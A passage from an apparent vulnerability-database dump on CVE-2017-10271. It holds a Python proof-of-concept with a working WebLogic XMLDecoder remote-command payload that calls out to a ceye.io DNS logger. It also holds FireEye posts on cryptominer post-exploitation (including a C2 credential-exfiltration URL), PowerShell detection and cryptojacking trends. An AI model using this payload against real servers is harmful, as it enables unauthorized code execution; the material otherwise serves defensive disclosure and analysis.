Security\u5b50\u7ec4\u4ef6\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\u3002\u653b\u51fb\u8005\u53ef\u5229\u7528\u8be5\u6f0f\u6d1e\u63a7\u5236\u7ec4\u4ef6\uff0c\u5f71\u54cd\u6570\u636e\u7684\u53ef\u7528\u6027\u3001\u4fdd\u5bc6\u6027\u548c\u5b8c\u6574\u6027\u3002\u4ee5\u4e0b\u7ec4\u7248\u672c\u53d7\u5230\u5f71\u54cd\uff1aOracle WebLogic Server 10.3.6.0.0\u7248\u672c\uff0c12.1.3.0.0\u7248\u672c\uff0c12.2.1.1.0\u7248\u672c\uff0c12.2.1.2.0\u7248\u672c\u3002\r\n\r\n '''\r\n\r\n samples = []\r\n\r\n def verify_request(self, token, type, flag):\r\n retVal = False\r\n counts = 3\r\n url = \"http://api.ceye.io/v1/records?token={token}&type={type}&filter={flag}\".format(token=token, type=type, flag=flag)\r\n while counts:\r\n try:\r\n time.sleep(1)\r\n resp = req.get(url)\r\n if resp and resp.status_code == 200 and flag in resp.content:\r\n retVal = True\r\n break\r\n except Exception as ex:\r\n logger.warn(ex.message)\r\n time.sleep(1)\r\n\r\n counts -= 1\r\n\r\n return retVal\r\n\r\n\r\n def test_uri(self, uri):\r\n flag = \"\".join(random.choice(string.ascii_letters) for _ in xrange(0, 8))\r\n headers = {\r\n 'SOAPAction': \"\",\r\n 'Content-Type': 'text/xml;charset=UTF-8'\r\n }\r\n path = '/wls-wsat/CoordinatorPortType11'\r\n url = urlparse.urljoin(uri, path)\r\n postdata = \"\"\"\r\n <soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"> \r\n <soapenv:Header> \r\n <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"> \r\n <java version=\"1.8.0_131\" class=\"java.beans.XMLDecoder\"> \r\n <object class=\"java.lang.ProcessBuilder\"> \r\n <array class=\"java.lang.String\" length=\"2\"> \r\n <void index=\"0\"> \r\n <string>nslookup</string> \r\n </void> \r\n <void index=\"1\"> \r\n <string>{0}.dns.j3170ioc.ceye.io</string> \r\n </void> \r\n </array> \r\n <void method=\"start\"/> \r\n </object> \r\n </java> \r\n </work:WorkContext> \r\n </soapenv:Header> \r\n <soapenv:Body/> \r\n </soapenv:Envelope>\r\n \"\"\".format(flag)\r\n try:\r\n resp = req.post(url, data=postdata, headers=headers)\r\n if resp.status_code == 500 and self.verify_request(token=\"5df9bef9ed0d27df6f8csc1452b99b5b2p\", type=\"dns\", flag=flag):\r\n return True\r\n\r\n except Exception as ex:\r\n logger.warning(ex.message)\r\n return False\r\n\r\n\r\n def _verify(self):\r\n result = {}\r\n pr = urlparse.urlparse(self.url)\r\n ports = [7001]\r\n if pr.port not in ports:\r\n ports.insert(0, pr.port)\r\n for port in ports:\r\n uri = \"{0}://{1}:{2}\".format(pr.scheme, pr.hostname, str(port))\r\n if self.test_uri(uri):\r\n result['VerifyInfo'] = {}\r\n result['VerifyInfo']['URL'] = uri\r\n break\r\n\r\n return self.parse_output(result)\r\n\r\n def _attack(self):\r\n return self._verify()\r\n\r\n def parse_output(self, result):\r\n output = Output(self)\r\n if result:\r\n output.success(result)\r\n else:\r\n output.fail('Internet nothing returned')\r\n return output\r\n\r\n\r\n\r\nregister(TestPOC)\n ", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-97009"}], "fireeye": [{"lastseen": "2018-08-31T00:18:23", "bulletinFamily": "info", "cvelist": ["CVE-2017-0144", "CVE-2017-10271"], "description": "#### Introduction\n\nFireEye researchers recently observed threat actors abusing CVE-2017-10271 to deliver various cryptocurrency miners.\n\nCVE-2017-10271 is a known input validation vulnerability that exists in the WebLogic Server Security Service (WLS Security) in Oracle WebLogic Server versions 12.2.1.2.0 and prior, and attackers can exploit it to remotely execute arbitrary code. Oracle released a [Critical Patch Update](<http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html>) that reportedly fixes this vulnerability. Users who failed to patch their systems may find themselves mining cryptocurrency for threat actors.\n\nFireEye observed a high volume of activity associated with the exploitation of CVE-2017-10271 following the public posting of proof of concept code in December 2017. Attackers then leveraged this vulnerability to download cryptocurrency miners in victim environments.\n\nWe saw evidence of organizations located in various countries \u2013 including the United States, Australia, Hong Kong, United Kingdom, India, Malaysia, and Spain, as well as those from nearly every industry vertical \u2013 being impacted by this activity. Actors involved in cryptocurrency mining operations mainly exploit opportunistic targets rather than specific organizations. This coupled with the diversity of organizations potentially affected by this activity suggests that the external targeting calculus of these attacks is indiscriminate in nature.\n\nThe recent cryptocurrency boom has resulted in a growing number of operations \u2013 employing diverse tactics \u2013 aimed at stealing cryptocurrencies. The idea that these cryptocurrency mining operations are less risky, along with the potentially nice profits, could lead cyber criminals to begin shifting away from ransomware campaigns.\n\n#### Tactic #1: Delivering the miner directly to a vulnerable server\n\nSome tactics we've observed involve exploiting CVE-2017-10271, leveraging PowerShell to download the miner directly onto the victim\u2019s system (Figure 1), and executing it using ShellExecute().\n\n \nFigure 1: Downloading the payload directly\n\n#### Tactic #2: Utilizing PowerShell scripts to deliver the miner\n\nOther tactics involve the exploit delivering a PowerShell script, instead of downloading the executable directly (Figure 2).\n\n \nFigure 2: Exploit delivering PowerShell script\n\nThis script has the following functionalities:\n\n * **Downloading miners from remote servers**\n\n \nFigure 3: Downloading cryptominers\n\nAs shown in Figure 3, the .ps1 script tries to download the payload from the remote server to a vulnerable server.\n\n * **Creating scheduled tasks for persistence**\n\n \nFigure 4: Creation of scheduled task\n\n * **Deleting scheduled tasks of other known cryptominers**\n\n \nFigure 5: Deletion of scheduled tasks related to other miners\n\nIn Figure 4, the cryptominer creates a scheduled task with name \u201c_Update service for Oracle products1_\u201d. In Figure 5, a different variant deletes this task and other similar tasks after creating its own, \u201c_Update service for Oracle productsa_\u201d. \n\nFrom this, it\u2019s quite clear that different attackers are fighting over the resources available in the system.\n\n * **Killing processes matching certain strings associated with other cryptominers**\n\n \nFigure 6: Terminating processes directly\n\n \nFigure 7: Terminating processes matching certain strings\n\nSimilar to scheduled tasks deletion, certain known mining processes are also terminated (Figure 6 and Figure 7).\n\n * **Connects to mining pools with wallet key**\n\n \nFigure 8: Connection to mining pools\n\nThe miner is then executed with different flags to connect to mining pools (Figure 8). Some of the other observed flags are: -a for algorithm, -k for keepalive to prevent timeout, -o for URL of mining server, -u for wallet key, -p for password of mining server, and -t for limiting the number of miner threads.\n\n * **Limiting CPU usage to avoid suspicion**\n\n \nFigure 9: Limiting CPU Usage\n\nTo avoid suspicion, some attackers are limiting the CPU usage of the miner (Figure 9).\n\n#### Tactic #3: Lateral movement across Windows environments using Mimikatz and EternalBlue\n\nSome tactics involve spreading laterally across a victim\u2019s environment using dumped Windows credentials and the [EternalBlue](<https://www.fireeye.com/blog/threat-research/2017/05/smb-exploited-wannacry-use-of-eternalblue.html>) vulnerability ([CVE-2017-0144](<https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010>)).\n\nThe malware checks whether its running on a 32-bit or 64-bit system to determine which PowerShell script to grab from the command and control (C2) server. It looks at every network adapter, aggregating all destination IPs of established non-loopback network connections. Every IP address is then tested with extracted credentials and a credential-based execution of PowerShell is attempted that downloads and executes the malware from the C2 server on the target machine. This variant maintains persistence via WMI (Windows Management Instrumentation).\n\nThe malware also has the capability to perform a [Pass-the-Hash](<https://en.wikipedia.org/wiki/Pass_the_hash>) attack with the NTLM information derived from Mimikatz in order to download and execute the malware in remote systems.\n\nAdditionally, the malware exfiltrates stolen credentials to the attacker via an HTTP GET request to: 'http://<C2>:8000/api.php?data=<credential data>'.\n\nIf the lateral movement with credentials fails, then the malware uses PingCastle MS17-010 scanner (PingCastle is a French Active Directory security tool) to scan that particular host to determine if its vulnerable to EternalBlue, and uses it to spread to that host.\n\nAfter all network derived IPs have been processed, the malware generates random IPs and uses the same combination of PingCastle and EternalBlue to spread to that host.\n\n#### Tactic #4: Scenarios observed in Linux OS\n\nWe\u2019ve also observed this vulnerability being exploited to deliver shell scripts (Figure 10) that have functionality similar to the PowerShell scripts.\n\n \nFigure 10: Delivery of shell scripts\n\nThe shell script performs the following activities:\n\n * **Attempts to kill already running cryptominers**\n\n \nFigure 11: Terminating processes matching certain strings\n\n * **Downloads and executes cryptominer malware**\n\n \nFigure 12: Downloading CryptoMiner\n\n * **Creates a cron job to maintain persistence**\n\n \nFigure 13: Cron job for persistence\n\n * **Tries to kill other potential miners to hog the CPU usage**\n\n \nFigure 14: Terminating other potential miners\n\nThe function shown in Figure 14 is used to find processes that have high CPU usage and terminate them. This terminates other potential miners and maximizes the utilization of resources.\n\n#### Conclusion\n\nUse of cryptocurrency mining malware is a popular tactic leveraged by financially-motivated cyber criminals to make money from victims. We\u2019ve observed one threat actor mining around 1 XMR/day, demonstrating the potential profitability and reason behind the recent rise in such attacks. Additionally, these operations may be perceived as less risky when compared to ransomware operations, since victims may not even know the activity is occurring beyond the slowdown in system performance.\n\nNotably, cryptocurrency mining malware is being distributed using various tactics, typically in an opportunistic and indiscriminate manner so cyber criminals will maximize their outreach and profits.\n\nFireEye HX, being a behavior-based solution, is not affected by cryptominer tricks. FireEye HX detects these threats at the initial level of the attack cycle, when the attackers attempt to deliver the first stage payload or when the miner tries to connect to mining pools.\n\nAt the time of writing, FireEye HX detects this activity with the following indicators:\n\n**Detection Name** \n \n--- \n \nPOWERSHELL DOWNLOADER (METHODOLOGY) \n \nMONERO MINER (METHODOLOGY) \n \nMIMIKATZ (CREDENTIAL STEALER) \n \n#### Indicators of Compromise\n\n**MD5**\n\n| \n\n**Name** \n \n---|--- \n \n3421A769308D39D4E9C7E8CAECAF7FC4\n\n| \n\ncranberry.exe/logic.exe \n \nB3A831BFA590274902C77B6C7D4C31AE\n\n| \n\nxmrig.exe/yam.exe \n \n26404FEDE71F3F713175A3A3CEBC619B\n\n| \n\n1.ps1 \n \nD3D10FAA69A10AC754E3B7DDE9178C22\n\n| \n\n2.ps1 \n \n9C91B5CF6ECED54ABB82D1050C5893F2\n\n| \n\ninfo3.ps1 \n \n3AAD3FABF29F9DF65DCBD0F308FF0FA8\n\n| \n\ninfo6.ps1 \n \n933633F2ACFC5909C83F5C73B6FC97CC\n\n| \n\nlower.css \n \nB47DAF937897043745DF81F32B9D7565\n\n| \n\nlib.css \n \n3542AC729035C0F3DB186DDF2178B6A0\n\n| \n\nbootstrap.css \n \nThanks to Dileep Kumar Jallepalli and Charles Carmakal for their help in the analysis.\n", "modified": "2018-02-15T11:30:00", "published": "2018-02-15T11:30:00", "id": "FIREEYE:399092589F455855881447C60B56C21A", "href": "https://www.fireeye.com/blog/threat-research/2018/02/cve-2017-10271-used-to-deliver-cryptominers.html", "type": "fireeye", "title": "CVE-2017-10271 Used to Deliver CryptoMiners: An Overview of Techniques Used Post-Exploitation and Pre-Mining", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:18:22", "bulletinFamily": "info", "cvelist": ["CVE-2017-10271"], "description": "#### Introduction****\n\nCyber security vendors and researchers have reported for years how PowerShell is being used by cyber threat actors to [install backdoors](<https://www.fireeye.com/blog/threat-research/2017/02/spear_phishing_techn.html>), [execute malicious code](<https://www.csoonline.com/article/3227046/malware/what-is-a-fileless-attack-how-hackers-invade-systems-without-installing-software.html>), and otherwise achieve their objectives within enterprises. Security is a cat-and-mouse game between adversaries, researchers, and blue teams. The flexibility and capability of PowerShell has made conventional detection both challenging and critical. This blog post will illustrate how FireEye is leveraging artificial intelligence and machine learning to raise the bar for adversaries that use PowerShell.\n\nIn this post you will learn:\n\n * Why malicious PowerShell can be challenging to detect with a traditional \u201csignature-based\u201d or \u201crule-based\u201d detection engine.\n * How Natural Language Processing (NLP) can be applied to tackle this challenge.\n * How our NLP model detects malicious PowerShell commands, even if obfuscated.\n * The economics of increasing the cost for the adversaries to bypass security solutions, while potentially reducing the release time of security content for detection engines.\n\n#### Background****\n\nPowerShell is one of the most [popular tools](<https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html>) used to carry out attacks. Data gathered from FireEye Dynamic Threat Intelligence (DTI) Cloud shows malicious PowerShell attacks rising throughout 2017 (Figure 1).\n\n \nFigure 1: PowerShell attack statistics observed by FireEye DTI Cloud in 2017 \u2013 blue bars for the number of attacks detected, with the red curve for exponentially smoothed time series\n\nFireEye has been tracking the malicious use of PowerShell for years. In 2014, Mandiant incident response investigators published a Black Hat paper that covers the [tactics, techniques and procedures (TTPs) used in PowerShell attacks](<https://www.blackhat.com/docs/us-14/materials/us-14-Kazanciyan-Investigating-Powershell-Attacks-WP.pdf>), as well as forensic artifacts on disk, in logs, and in memory produced from malicious use of PowerShell. In 2016, we published a blog post on how to [improve PowerShell logging](<https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html>), which gives greater visibility into potential attacker activity. More recently, our in-depth report on [APT32](<https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html>) highlighted this threat actor's use of PowerShell for reconnaissance and lateral movement procedures, as illustrated in Figure 2.\n\n \nFigure 2: APT32 attack lifecycle, showing PowerShell attacks found in the kill chain\n\nLet\u2019s take a deep dive into an example of a malicious PowerShell command (Figure 3).\n\n \nFigure 3: Example of a malicious PowerShell command\n\nThe following is a quick explanation of the [arguments](<https://docs.microsoft.com/en-us/powershell/scripting/powershell-scripting?view=powershell-6>):\n\n * -NoProfile \u2013 indicates that the current user\u2019s profile setup script should not be executed when the PowerShell engine starts.\n * -NonI \u2013 shorthand for -NonInteractive, meaning an interactive prompt to the user will not be presented.\n * -W Hidden \u2013 shorthand for \u201c-WindowStyle Hidden\u201d, which indicates that the PowerShell session window should be started in a hidden manner.\n * -Exec Bypass \u2013 shorthand for \u201c-ExecutionPolicy Bypass\u201d, which disables the execution policy for the current PowerShell session (default disallows execution). It should be noted that the Execution Policy isn\u2019t meant to be a security boundary.\n * -encodedcommand \u2013 indicates the following chunk of text is a base64 encoded command.\n\nWhat is hidden inside the Base64 decoded portion? Figure 4 shows the decoded command.\n\n \nFigure 4: The decoded command for the aforementioned example\n\nInterestingly, the decoded command unveils a stealthy fileless network access and remote content execution!\n\n * _IEX_ is an alias for the _Invoke-Expression_ cmdlet that will execute the command provided on the local machine.\n * **The _new-object_** cmdlet creates an instance of a .NET Framework or COM object, here a _net.webclient_ object.\n * The _downloadstring_ will download the contents from <url> into a memory buffer (which in turn _IEX_ will execute).\n\nIt\u2019s worth mentioning that a similar malicious PowerShell tactic was used in a recent cryptojacking attack exploiting [CVE-2017-10271 to deliver a cryptocurrency miner](<https://www.fireeye.com/blog/threat-research/2018/02/cve-2017-10271-used-to-deliver-cryptominers.html>). This attack involved the exploit being leveraged to deliver a PowerShell script, instead of downloading the executable directly. This PowerShell command is particularly stealthy because it leaves practically zero file artifacts on the host, making it hard for traditional antivirus to detect.\n\nThere are several reasons why adversaries prefer PowerShell:\n\n 1. PowerShell has been widely adopted in Microsoft Windows as a powerful system administration scripting tool.\n 2. Most attacker logic can be written in PowerShell without the need to install malicious binaries. This enables a minimal footprint on the endpoint.\n 3. The flexible PowerShell syntax imposes combinatorial complexity challenges to signature-based detection rules.\n\nAdditionally, from an economics perspective:\n\n * Offensively, the cost for adversaries to modify PowerShell to bypass a signature-based rule is quite low, especially with [open source obfuscation tools](<https://www.fireeye.com/blog/threat-research/2017/07/revoke-obfuscation-powershell.html>).\n * Defensively, updating handcrafted signature-based rules for new threats is time-consuming and limited to experts.\n\nNext, we would like to share how we at FireEye are combining our PowerShell threat research with data science to combat this threat, thus raising the bar for adversaries.\n\n#### Natural Language Processing for Detecting Malicious PowerShell****\n\nCan we use machine learning to predict if a PowerShell command is malicious?\n\nOne advantage FireEye has is our repository of high quality PowerShell examples that we harvest from our global deployments of FireEye solutions and services. Working closely with our in-house PowerShell experts, we curated a large training set that was comprised of malicious commands, as well as benign commands found in enterprise networks.\n\nAfter we reviewed the PowerShell corpus, we quickly realized this fit nicely into the NLP problem space. We have built an NLP model that interprets PowerShell command text, similar to how Amazon Alexa interprets your voice commands.\n\nOne of the technical challenges we tackled was** **synonym, a problem studied in linguistics. For instance, \u201cNOL\u201d, \u201cNOLO\u201d, and \u201cNOLOGO\u201d have identical semantics in PowerShell syntax. In NLP, a [stemming](<https://en.wikipedia.org/wiki/Stemming>) algorithm will reduce the word to its original form, such as \u201cInnovating\u201d being stemmed to \u201cInnovate\u201d.\n\nWe created a prefix-tree based stemmer for the PowerShell command syntax using an efficient data structure known as [trie](<https://en.wikipedia.org/wiki/Trie>), as shown in Figure 5. Even in a complex scripting language such as PowerShell, a trie can stem command tokens in nanoseconds.\n\n \nFigure 5: Synonyms in the PowerShell syntax (left) and the trie stemmer capturing these equivalences (right)\n\nThe overall NLP pipeline we developed is captured in the following table:\n\nNLP Key Modules\n\n| \n\nFunctionality \n \n---|--- \n \nDecoder\n\n| \n\nDetect and decode any encoded text \n \nNamed Entity Recognition (NER)\n\n| \n\nDetect and recognize any entities such as IP, URL, Email, Registry key, etc. \n \nTokenizer\n\n| \n\nTokenize the PowerShell command into a list of tokens \n \nStemmer\n\n| \n\nStem tokens into semantically identical token, uses trie \n \nVocabulary Vectorizer\n\n| \n\nVectorize the list of tokens into machine learning friendly format \n \nSupervised classifier\n\n| \n\nBinary classification algorithms:\n\n * Kernel Support Vector Machine\n * Gradient Boosted Trees\n * Deep Neural Networks \n \nReasoning\n\n| \n\nThe explanation of why the prediction was made. Enables analysts to validate predications. \n \nThe following are the key steps when streaming the aforementioned example through the NLP pipeline:\n\n * Detect and decode the Base64 commands, if any\n * Recognize entities using Named Entity Recognition (NER), such as the <URL>\n * Tokenize the entire text, including both clear text and obfuscated commands\n * Stem each token, and vectorize them based on the vocabulary\n * Predict the malicious probability using the supervised learning model\n\n \nFigure 6: NLP pipeline that predicts the malicious probability of a PowerShell command\n\nMore importantly, we established a production end-to-end machine learning pipeline (Figure 7) so that we can constantly evolve with adversaries through re-labeling and re-training, and the release of the machine learning model into our products.\n\n \nFigure 7: End-to-end machine learning production pipeline for PowerShell machine learning\n\n#### Value Validated in the Field****\n\nWe successfully implemented and optimized this machine learning model to a minimal footprint that fits into our research endpoint agent, which is able to make predictions in milliseconds on the host. Throughout 2018, we have deployed this PowerShell machine learning detection engine on incident response engagements. Early field validation has confirmed detections of malicious PowerShell attacks, including:\n\n * Commodity malware such as Kovter.\n * Red team penetration test activities.\n * New variants that bypassed legacy signatures, while detected by our machine learning with high probabilistic confidence.\n\nThe unique values brought by the PowerShell machine learning detection engine include: \n\n * The machine learning model automatically learns the malicious patterns from the curated corpus. In contrast to traditional detection signature rule engines, which are Boolean expression and regex based, the NLP model has lower operation cost and significantly cuts down the release time of security content.\n * The model performs probabilistic inference on unknown PowerShell commands by the implicitly learned non-linear combinations of certain patterns, which increases the cost for the adversaries to bypass.\n\nThe ultimate value of this innovation is to evolve with the broader threat landscape, and to create a competitive edge over adversaries.\n\n#### Acknowledgements\n\nWe would like to acknowledge:\n\n * Daniel Bohannon, Christopher Glyer and Nick Carr for the support on threat research.\n * Alex Rivlin, HeeJong Lee, and Benjamin Chang from FireEye Labs for providing the DTI statistics.\n * Research endpoint support from Caleb Madrigal.\n * The FireEye ICE-DS Team.\n", "modified": "2018-07-10T12:00:00", "published": "2018-07-10T12:00:00", "id": "FIREEYE:6B4CFD4290F6444DFC070D828CEC509A", "href": "https://www.fireeye.com/blog/threat-research/2018/07/malicious-powershell-detection-via-machine-learning.html", "type": "fireeye", "title": "Malicious PowerShell Detection via Machine Learning", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T00:18:22", "bulletinFamily": "info", "cvelist": ["CVE-2016-0099", "CVE-2017-10271"], "description": "#### Introduction\n\nCyber criminals tend to favor cryptocurrencies because they provide a certain level of anonymity and can be easily monetized. This [interest has increased in recent years](<https://www.fireeye.com/blog/threat-research/2018/04/cryptocurrencies-cyber-crime-blockchain-infrastructure-use.html>), stemming far beyond the desire to simply use cryptocurrencies as a method of payment for illicit tools and services. Many actors have also attempted to capitalize on the growing popularity of cryptocurrencies, and subsequent rising price, by conducting various operations aimed at them. These operations include malicious cryptocurrency mining (also referred to as cryptojacking), the collection of cryptocurrency wallet credentials, extortion activity, and the targeting of cryptocurrency exchanges.\n\nThis blog post discusses the various trends that we have been observing related to cryptojacking activity, including cryptojacking modules being added to popular malware families, an increase in drive-by cryptomining attacks, the use of mobile apps containing cryptojacking code, cryptojacking as a threat to critical infrastructure, and observed distribution mechanisms.\n\n#### What Is Mining?\n\nAs transactions occur on a blockchain, those transactions must be validated and propagated across the network. As computers connected to the blockchain network (aka nodes) validate and propagate the transactions across the network, the miners include those transactions into \"blocks\" so that they can be added onto the chain. Each block is cryptographically hashed, and must include the hash of the previous block, thus forming the \"chain\" in blockchain. In order for miners to compute the complex hashing of each valid block, they must use a machine's computational resources. The more blocks that are mined, the more resource-intensive solving the hash becomes. To overcome this, and accelerate the mining process, many miners will join collections of computers called \"pools\" that work together to calculate the block hashes. The more computational resources a pool harnesses, the greater the pool's chance of mining a new block. When a new block is mined, the pool's participants are rewarded with coins. Figure 1 illustrates the roles miners play in the blockchain network.\n\n \nFigure 1: The role of miners\n\n#### Underground Interest\n\nFireEye iSIGHT Intelligence has identified eCrime actor interest in cryptocurrency mining-related topics dating back to at least 2009 within underground communities. Keywords that yielded significant volumes include miner, cryptonight, stratum, xmrig, and cpuminer. While searches for certain keywords fail to provide context, the frequency of these cryptocurrency mining-related keywords shows a sharp increase in conversations beginning in 2017 (Figure 2). It is probable that at least a subset of actors prefer cryptojacking over other types of financially motivated operations due to the perception that it does not attract as much attention from law enforcement.\n\n \nFigure 2: Underground keyword mentions\n\n#### Monero Is King\n\nThe majority of recent cryptojacking operations have overwhelmingly focused on mining Monero, an open-source cryptocurrency based on the CryptoNote protocol, as a fork of Bytecoin. Unlike many cryptocurrencies, Monero uses a unique technology called \"ring signatures,\" which shuffles users' public keys to eliminate the possibility of identifying a particular user, ensuring it is untraceable. Monero also employs a protocol that generates multiple, unique single-use addresses that can only be associated with the payment recipient and are unfeasible to be revealed through blockchain analysis, ensuring that Monero transactions are unable to be linked while also being cryptographically secure.\n\nThe Monero blockchain also uses what's called a \"memory-hard\" hashing algorithm called CryptoNight and, unlike Bitcoin's SHA-256 algorithm, it deters application-specific integrated circuit (ASIC) chip mining. This feature is critical to the Monero developers and allows for CPU mining to remain feasible and profitable. Due to these inherent privacy-focused features and CPU-mining profitability, Monero has become an attractive option for cyber criminals.\n\n#### Underground Advertisements for Miners\n\nBecause most miner utilities are small, open-sourced tools, many criminals rely on crypters. Crypters are tools that employ encryption, obfuscation, and code manipulation techniques to keep their tools and malware fully undetectable (FUD). Table 1 highlights some of the most commonly repurposed Monero miner utilities.\n\n**XMR Mining Utilities** \n \n--- \n \nXMR-STACK \n \nMINERGATE \n \nXMRMINER \n \nCCMINER \n \nXMRIG \n \nCLAYMORE \n \nSGMINER \n \nCAST XMR \n \nLUKMINER \n \nCPUMINER-MULTI \n \nTable 1: Commonly used Monero miner utilities\n\nThe following are sample advertisements for miner utilities commonly observed in underground forums and markets. Advertisements typically range from stand-alone miner utilities to those bundled with other functions, such as credential harvesters, remote administration tool (RAT) behavior, USB spreaders, and distributed denial-of-service (DDoS) capabilities.\n\n##### Sample Advertisement #1 (Smart Miner + Builder)\n\nIn early April 2018, actor \"Mon\u00a3y\" was observed by FireEye iSIGHT Intelligence selling a Monero miner for $80 USD \u2013 payable via Bitcoin, Bitcoin Cash, Ether, Litecoin, or Monero \u2013 that included unlimited builds, free automatic updates, and 24/7 support. The tool, dubbed Monero Madness (Figure 3), featured a setting called Madness Mode that configures the miner to only run when the infected machine is idle for at least 60 seconds. This allows the miner to work at its full potential without running the risk of being identified by the user. According to the actor, Monero Madness also provides the following features:\n\n * Unlimited builds\n * Builder GUI (Figure 4)\n * Written in AutoIT (no dependencies)\n * FUD\n * Safer error handling\n * Uses most recent XMRig code\n * Customizable pool/port\n * Packed with UPX\n * Works on all Windows OS (32- and 64-bit)\n * Madness Mode option\n\n \nFigure 3: Monero Madness\n\n \nFigure 4: Monero Madness builder\n\n##### Sample Advertisement #2 (Miner + Telegram Bot Builder)\n\nIn March 2018, FireEye iSIGHT Intelligence observed actor \"kent9876\" advertising a Monero cryptocurrency miner called Goldig Miner (Figure 5). The actor requested payment of $23 USD for either CPU or GPU build or $50 USD for both. Payments could be made with Bitcoin, Ether, Litecoin, Dash, or PayPal. The miner ostensibly offers the following features:\n\n * Written in C/C++\n * Build size is small (about 100\u2013150 kB)\n * Hides miner process from popular task managers\n * Can run without Administrator privileges (user-mode)\n * Auto-update ability\n * All data encoded with 256-bit key\n * Access to Telegram bot-builder\n * Lifetime support (24/7) via Telegram\n\n \nFigure 5: Goldig Miner advertisement\n\n##### Sample Advertisement #3 (Miner + Credential Stealer)\n\nIn March 2018, FireEye iSIGHT Intelligence observed actor \"TH3FR3D\" offering a tool dubbed Felix (Figure 6) that combines a cryptocurrency miner and credential stealer. The actor requested payment of $50 USD payable via Bitcoin or Ether. According to the advertisement, the Felix tool boasted the following features:\n\n * Written in C# (Version 1.0.1.0)\n * Browser stealer for all major browsers (cookies, saved passwords, auto-fill)\n * Monero miner (uses minergate.com pool by default, but can be configured)\n * Filezilla stealer\n * Desktop file grabber (.txt and more)\n * Can download and execute files\n * Update ability\n * USB spreader functionality\n * PHP web panel\n\n \nFigure 6: Felix HTTP\n\n##### Sample Advertisement #4 (Miner + RAT)\n\nIn January 2018, FireEye iSIGHT Intelligence observed actor \"ups\" selling a miner for any Cryptonight-based cryptocurrency (e.g., Monero and Dashcoin) for either Linux or Windows operating systems. In addition to being a miner, the tool allegedly provides local privilege escalation through the [CVE-2016-0099](<https://docs.microsoft.com/en-us/security-updates/securitybulletins/2016/ms16-032>) exploit, can download and execute remote files, and receive commands. Buyers could purchase the Windows or Linux tool for \u20ac200 EUR, or \u20ac325 EUR for both the Linux and Windows builds, payable via Monero, bitcoin, ether, or dash. According to the actor, the tool offered the following:\n\n_Windows Build Specifics_\n\n * Written in C++ (no dependencies)\n * Miner component based on XMRig\n * Easy cryptor and VPS hosting options\n * Web panel (Figure 7)\n * Uses TLS for secured communication\n * Download and execute\n * Auto-update ability\n * Cleanup routine\n * Receive remote commands\n * Perform privilege escalation\n * Features \"game mode\" (mining stops if user plays game)\n * Proxy feature (based on XMRig)\n * Support (for \u20ac20/month)\n * Kills other miners from list\n * Hidden from TaskManager\n * Configurable pool, coin, and wallet (via panel)\n * Can mine the following Cryptonight-based coins:\n * Monero\n * Bytecoin\n * Electroneum\n * DigitalNote\n * Karbowanec\n * Sumokoin\n * Fantomcoin\n * Dinastycoin\n * Dashcoin\n * LeviarCoin\n * BipCoin\n * QuazarCoin\n * Bitcedi\n\n_Linux Build Specifics_\n\n * Issues running on Linux servers (higher performance on desktop OS)\n * Compatible with AMD64 processors on Ubuntu, Debian, Mint (support for CentOS later)\n\n \nFigure 7: Miner bot web panel\n\n##### Sample Advertisement #5 (Miner + USB Spreader + DDoS Tool)\n\nIn August 2017, actor \"MeatyBanana\" was observed by FireEye iSIGHT Intelligence selling a Monero miner utility that included the ability to download and execute files and perform DDoS attacks. The actor offered the software for $30 USD, payable via Bitcoin. Ostensibly, the tool works with CPUs only and offers the following features:\n\n * Configurable miner pool and port (default to minergate)\n * Compatible with both 64- and 86-bit Windows OS\n * Hides from the following popular task managers:\n * Windows Task Manager\n * Process Killer\n * KillProcess\n * System Explorer\n * Process Explorer\n * AnVir\n * Process Hacker\n * Masked as a system driver\n * Does not require administrator privileges\n * No dependencies\n * Registry persistence mechanism\n * Ability to perform \"tasks\" (download and execute files, navigate to a site, and perform DDoS)\n * USB spreader\n * Support after purchase\n\n#### The Cost of Cryptojacking\n\nThe presence of mining software on a network can generate costs on three fronts as the miner surreptitiously allocates resources:\n\n 1. Degradation in system performance\n 2. Increased cost in electricity\n 3. Potential exposure of security holes\n\nCryptojacking targets computer processing power, which can lead to high CPU load and degraded performance. In extreme cases, CPU overload may even cause the operating system to crash. Infected machines may also attempt to infect neighboring machines and therefore generate large amounts of traffic that can overload victims' computer networks.\n\nIn the case of operational technology (OT) networks, the consequences could be severe. Supervisory control and data acquisition/industrial control systems (SCADA/ICS) environments predominately rely on decades-old hardware and low-bandwidth networks, therefore even a slight increase in CPU load or the network could leave industrial infrastructures unresponsive, impeding operators from interacting with the controlled process in real-time.\n\nThe electricity cost, measured in kilowatt hour (kWh), is dependent upon several factors: how often the malicious miner software is configured to run, how many threads it's configured to use while running, and the number of machines mining on the victim's network. The cost per kWh is also highly variable and depends on geolocation. For example, security researchers who ran Coinhive on a machine for 24 hours found that the electrical consumption was 1.212kWh. They estimated that this equated to electrical costs per month of $10.50 USD in the United States, $5.45 USD in Singapore, and $12.30 USD in Germany.\n\nCryptojacking can also highlight often overlooked security holes in a company's network. Organizations infected with cryptomining malware are also likely vulnerable to more severe exploits and attacks, ranging from ransomware to ICS-specific malware such as [TRITON](<https://www.fireeye.com/blog/threat-research/2018/06/totally-tubular-treatise-on-triton-and-tristation.html>).\n\n#### Cryptocurrency Miner Distribution Techniques\n\nIn order to maximize profits, cyber criminals widely disseminate their miners using various techniques such as incorporating cryptojacking modules into existing botnets, drive-by cryptomining attacks, the use of mobile apps containing cryptojacking code, and distributing cryptojacking utilities via spam and self-propagating utilities. Threat actors can use cryptojacking to affect numerous devices and secretly siphon their computing 